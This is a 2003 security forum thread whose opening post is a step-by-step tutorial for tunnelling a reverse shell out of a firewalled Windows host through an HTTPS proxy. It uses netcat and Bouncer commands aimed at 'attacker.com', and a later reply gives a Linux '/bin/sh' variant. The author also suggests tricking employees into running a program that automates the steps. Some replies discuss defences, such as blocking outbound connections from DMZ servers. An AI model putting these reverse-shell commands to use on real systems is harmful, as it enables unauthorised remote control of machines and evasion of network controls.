Gaining an interactive shell through SSL tunneling

Printable View

October 31st, 2003, 08:19 PM
nlxoo

Gaining an interactive shell through SSL tunneling

I apologize if you already know this, but to those who don't:

You can get an interactive cmd.exe shell from a firewalled host if that host has access to a HTTP Proxy server that supports HTTPS.

The tools required are the win32 ports of NetCat and Bouncer from http://nlxoo.8bit.co.uk/

In this example, attacker.com is the attacker's host, victim.company.com is the victim's host and proxy.company.com is the victim's HTTP Proxy server

Step 1:
On attacker.com, the attacker executes:

Code:

nc.exe -l -p 443

Step 2:
On victim.company.com, the attacker executes:

Code:

bouncer.exe --bind 127.0.0.1 --port 9999 --destination attacker.com:443 --tunnel proxy.company.com:8080

Step 3:
On victim.company.com, the attacker executes:

Code:

nc.exe -e cmd.exe 127.0.0.1 9999

Result:
Inside the window from Step 1, the attacker gets the shell:

Code:

Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\nlxoo\Desktop\test>

Note:
1) If any of the programs or connections are terminated, the shell will be lost
2) The proxy server must support HTTPS
October 31st, 2003, 10:24 PM
br_fusion

Thanks for the info.
October 31st, 2003, 10:27 PM
MrLinus

Ok. So how would you prevent this from happening?
October 31st, 2003, 10:35 PM
nebulus200

Easy, don't allow your DMZ servers to make outbound connections...case closed. It is just a twist on shoveling a reverse shell (the only difference is the encryption, which I would suppose you could probably do with cryptcat...hmm...maybe I have something play with now).

/nebulus
October 31st, 2003, 10:43 PM
MrLinus

Duh! I wanted him to answer it... geez..
October 31st, 2003, 10:44 PM
nebulus200

Oops :/

EDIT: Dunno who negged him, but I can't tap him back up without massively awarding him...
October 31st, 2003, 10:50 PM
Tedob1

good lord/lordes! what a nightmare this could be... a disgruntled employee sets this to run friday night when no ones there.

what jerk negged him. would you rather not know about it?
October 31st, 2003, 10:56 PM
br_fusion

You have to understand, people get neg'ed all the time for next to no reason. Anything that blurs the line between white/black turns into a instant neg.

*few points i have, lost*
October 31st, 2003, 11:02 PM
:-\

So this dude gets hit with the green while poor newbie who actually points out the error sits there with some reds... someone fix this.. too bad I can't.. :fpissed:
October 31st, 2003, 11:04 PM
Tedob1

i guess it all depends on what you want to see here. IMO all none security posts in security threads should be negged. this is in the right forum. and is definitely security releated.

even if he dosnt have an anser to msmittens question someone else will...and another hole gets closed!
October 31st, 2003, 11:04 PM
:-\

Yay.. problem fixed.. :D
October 31st, 2003, 11:41 PM
Tiger Shark

I kind of made this point in a thread that many probably can't see, so I'll make it here.....

One of the reasons I come here is because there are several hundred "heads" all looking at the same problem, (computer security, in case anyone forgot..... ;) ). We all can't think of everything but when you have all these "heads" looking at all the many facets of computer security it sure helps out.

So this post was of use..... I hadn't thought about it..... but then my users wouldn't know netcat if it jumped up and slapped them in the face..... But it's something I will bear in mind for the future should I chose to implement the kind of architecture nlxoo describes......

Girls and Boys..... Information is power..... Ignorance may be bliss, but it sure sucks when you stand in front of the CEO who is asking "how did this happen"? If nxloo came here to disseminate this information with malicious intent then more fool him, he helped the people who are "on the other team", if he came here to bring something to " the other team's" attention then more power to him. Negging him for shedding light on how to act nefariously, whatever his intent, is kind of self defeating on a security site, don't you think?
October 31st, 2003, 11:53 PM
Tedob1

i couldn't agree with you more TS. i for one want to know what can be done to my network
November 1st, 2003, 03:26 AM
PuReExcTacy

Re: Gaining an interactive shell through SSL tunneling

Quote:

Originally posted here by nlxoo

Step 2:
On victim.company.com, the attacker executes:

Code:

bouncer.exe --bind 127.0.0.1 --port 9999 --destination attacker.com:443 --tunnel proxy.company.com:8080

If you can already do this, then what exactly are you gaining, you've already got shell access. Hell, from here, you can install whatever you want. And whatever remote admin tool you'd like. At that, I wouldn't set netcat to listen on my own box. That's just an invitation for someone else to check out your box.

You should mention this type of stuff, nice tutorial anyways.

--PuRe
November 1st, 2003, 04:12 AM
br_fusion

I dont think the tutorial's purpose was to gain remote access, but just how to encrypt your traffic once you compromise the host.
November 1st, 2003, 04:17 AM
fl34bit3

Well cheers to this. I definitly did not know that could be done. Thanks for the info. It shows thought that it is a win xp computer is it only for xp or possible on others.

PeacE
-BoB
November 1st, 2003, 05:34 AM
nlxoo

Re: Re: Gaining an interactive shell through SSL tunneling

Quote:

Originally posted here by PuReExcTacy

If you can already do this, then what exactly are you gaining, you've already got shell access. Hell, from here, you can install whatever you want. And whatever remote admin tool you'd like.

But what if the victim's machine (10.0.4.15) is on a LAN and has no full Internet access except access to a single HTTP proxy server (10.0.0.4) for web browsing?

It's impossible to run a trojan/backdoor on the victim's machine and expect to connect or even reach the victim's machine from outside the LAN.

This method is for a hacker who already has physical access to the firewalled host, e.g. an employee of a company who wants access to his work workstation from home OR a hacker who fools an employee of the company to download and execute a program that is programmed to automatically carry out steps 2 & 3.

Quote:

Originally posted here by PuReExcTacy

At that, I wouldn't set netcat to listen on my own box. That's just an invitation for someone else to check out your box.

eh? The netcat running on the attacker's host? That only opens port 443 and waits for someone to connect to the port. Not serving any data.

Quote:

Originally posted here by fl34bit3
Thanks for the info. It shows thought that it is a win xp computer is it only for xp or possible on others.

This method will work on Windows 2000 but not on the Windows 9x series.

I did try it on a Linux host but the Linux port of Bouncer gave me a "Segmentation Fault" error.
But in theory, it should work on Linux if you do this instead for Step 3:

Code:

./nc -e /bin/sh 127.0.0.1 9999